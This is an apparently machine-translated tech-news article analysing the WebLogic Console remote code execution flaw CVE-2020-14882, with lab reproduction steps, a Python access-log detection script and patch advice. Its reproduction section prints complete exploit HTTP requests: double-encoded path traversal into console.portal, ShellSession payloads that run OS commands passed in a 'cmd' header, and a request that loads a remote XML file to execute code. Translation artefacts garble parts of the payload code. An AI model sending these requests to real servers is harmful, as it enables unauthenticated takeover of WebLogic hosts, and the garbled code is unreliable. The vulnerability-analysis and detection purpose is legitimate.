2025-01-19 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains how to analyse the Weblogic Console remote code execution vulnerability CVE-2020-14882. It walks through the analysis and the corresponding remediation in detail, in the hope of helping readers who want to address this problem find a simple and feasible method.
0x00 Vulnerability introduction
On October 30th, 2020, it was found that Oracle's latest official patch for the Weblogic code execution vulnerability CVE-2020-14882 could be bypassed. Vulnerability number: CVE-2020-14882; vulnerability level: critical; vulnerability score: 9.8.
A remote attacker can construct a special HTTP request to take over the WebLogic Server Console without authentication and execute arbitrary code in the WebLogic Server Console.
0x01 Affected versions
Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
0x02 Vulnerability reproduction
Deploy Vulhub with Docker on a virtual machine to build the vulnerability test environment in one step:
docker-compose up -d
Access the vulnerable environment at:
http://192.168.60.130:7001/
The payload is constructed according to the needs of the exploitation. At present there are three commonly used forms:
1. The payload produces no echoed output after execution, but it has been executed successfully.
Construct the payload and execute it:
GET / console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession ("java.lang.Runtime.getRuntime (). Exec ('touch%20/tmp/yunzui');") HTTP/1.1
Host: 192.168.60.130:7001
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.60.130:7001/console/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSIONION color KSLiFfIosk7pDYFYp701K0Svy9 colors G8yZefB7whwyLGLvkhjKbTDROWTRAN 355433482
Connection: close
Content-Length: 4
Effect view
Or use a DNSLog platform for verification.
Generate a DNS domain name: idvek9.dnslog.cn
Construct the payload and execute it:
Effect view
Or use a Python script to exploit the vulnerability.
Effect view
2. The payload's output is echoed back after execution.
Payload submitted via GET:
GET / console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession ('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread) Thread.currentThread (); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork (); java.lang.reflect.Field field = adapter.getClass (). GetDeclaredField ("connectionHandler"); field.setAccessible (true); Object obj = field.get (adapter) Weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass () .getMethod ("getServletRequest") .invoke (obj); String cmd = req.getHeader ("cmd"); String [] cmds = System.getProperty ("os.name") .toLowerCase () .contains ("window")? New String [] {"cmd.exe", "/ c", cmd}: new String [] {"/ bin/sh", "- c", cmd}; if (cmd! = null) {String result = new java.util.Scanner (new java.lang.ProcessBuilder (cmds). Start (). GetInputStream ()) .useDelimiter ("\ A") .next (); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass (). GetMethod ("getResponse") .invoke (req) Res.getServletOutputStream () .writeStream (new weblogic.xml.util.StringInputStream (result)); res.getServletOutputStream () .flush ();} currentThread.interrupt ();') HTTP/1.1
Host: 192.168.60.130:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cmd:id
Content-Length: 0
Execute: id
Payload submitted via POST:
POST / console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 192.168.60.130:7001
Cmd: id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1258
_ nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession ("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread ()
Weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork ()
Java.lang.reflect.Field field = adapter.getClass () .getDeclaredField ("connectionHandler")
Field.setAccessible (true)
Object obj = field.get (adapter)
Weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass () .getMethod ("getServletRequest") .invoke (obj)
String cmd = req.getHeader ("cmd")
String [] cmds = System.getProperty ("os.name") .toLowerCase () .contains ("window")? New String [] {"cmd.exe", "/ c", cmd}: new String [] {"/ bin/sh", "- c", cmd}
If (cmd! = null) {
String result = new java.util.Scanner (java.lang.Runtime.getRuntime () .exec (cmds) .getInputStream ()) .useDelimiter ("\ A") .next ()
Weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass () .getMethod ("getResponse") .invoke (req)
Res.getServletOutputStream () .writeStream (new weblogic.xml.util.StringInputStream (result))
Res.getServletOutputStream () .flush ()
Res.getWriter () .write ("")
} executeThread.interrupt ()
")
Execute: id
3. The payload references an externally hosted XML file.
Generate a domain name through the DNSLog platform: bq11vi.dnslog.cn
Execute (GET):
GET / console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext ("http://192.168.60.1/weblogic.xml") HTTP/1.1"
Host: 192.168.60.130:7001
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.60.130:7001/console/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSIONION color KSLiFfIosk7pDYFYp701K0Svy9 colors G8yZefB7whwyLGLvkhjKbTDROWTRAN 355433482
Connection: close
Effect view
Execute (POST):
POST / console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 192.168.60.130:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: * / *
Connection: keep-alive
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 153
CMD:whoami
_ nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext ("http://192.168.60.1/weblogic.xml")
Effect view
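As an added example (not part of the original article), the following Python script checks web-server access-log lines for the traffic pattern shown in the requests above: the percent-encoded `..` traversal under /console/ that reaches console.portal or consolejndi.portal, and the two gadget class names in the query string. It assumes a combined-style access log; the log lines and IP addresses are constructed, and since request bodies and custom headers such as cmd: are not logged, POST requests to a traversed portal path are flagged on the path alone.

```python
import re
from urllib.parse import unquote, urlsplit
# Gadget class names seen in the requests above; matched as plain strings only.
GADGETS = (
    "com.tangosol.coherence.mvel2.sh.ShellSession",
    "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext",
)
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
# Combined-format access-log line; custom headers such as cmd: are not logged.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" \d{3}')

def fully_decode(s, max_rounds=3):
    """Undo repeated percent-encoding (%252e -> %2e -> .), as the console path is."""
    for _ in range(max_rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s

def analyse_request(method, target):
    """Return indicator names for one request target; empty list means nothing seen."""
    findings = []
    parts = urlsplit(target)
    path = fully_decode(parts.path)
    if path.lower().startswith("/console/") and TRAVERSAL.search(path):
        findings.append("console-path-traversal")
        if path != parts.path:
            findings.append("double-encoded-traversal")  # %252e-style encoding in the raw path
        if method == "POST":
            findings.append("post-to-traversed-portal")  # handle= is in the body, not the log
    query = fully_decode(parts.query)
    for g in GADGETS:
        if g in query:
            findings.append("gadget:" + g.rsplit(".", 1)[-1])
    return findings

def scan_log(text):
    # Return (ip, method, findings) for every line that carries at least one indicator.
    hits = []
    for line in text.splitlines():
        if (m := LOG_RE.match(line)) and (f := analyse_request(m["method"], m["target"])):
            hits.append((m["ip"], m["method"], f))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [31/May/2021:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1234
198.51.100.7 - - [31/May/2021:10:00:05 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22x%22) HTTP/1.1" 200 0
198.51.100.7 - - [31/May/2021:10:00:09 +0000] "POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1" 200 0
203.0.113.5 - - [31/May/2021:10:00:12 +0000] "GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://example.invalid/x.xml%22) HTTP/1.1" 200 0
"""
```

Running `scan_log(SAMPLE_LOG)` reports the three suspicious lines and leaves the normal login-page request alone; the same path normalisation is what a WAF rule or a reverse proxy in front of /console should apply before matching.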
0x03 Remediation recommendations
As a temporary measure, users are advised to promptly shut off external access to the Weblogic back-end at /console/console.portal.
Oracle's official Critical Patch Update (CPU) has released a patch for this vulnerability; please download the patch and install the update promptly.
Note: the official Oracle patch requires a licensed account for genuine software. After logging in to https://support.oracle.com with that account, you can download the latest patch.
This concludes the analysis of the Weblogic Console remote code execution vulnerability CVE-2020-14882. I hope the above content is of some help to you. If you still have doubts, you can follow the industry information channel for more related knowledge.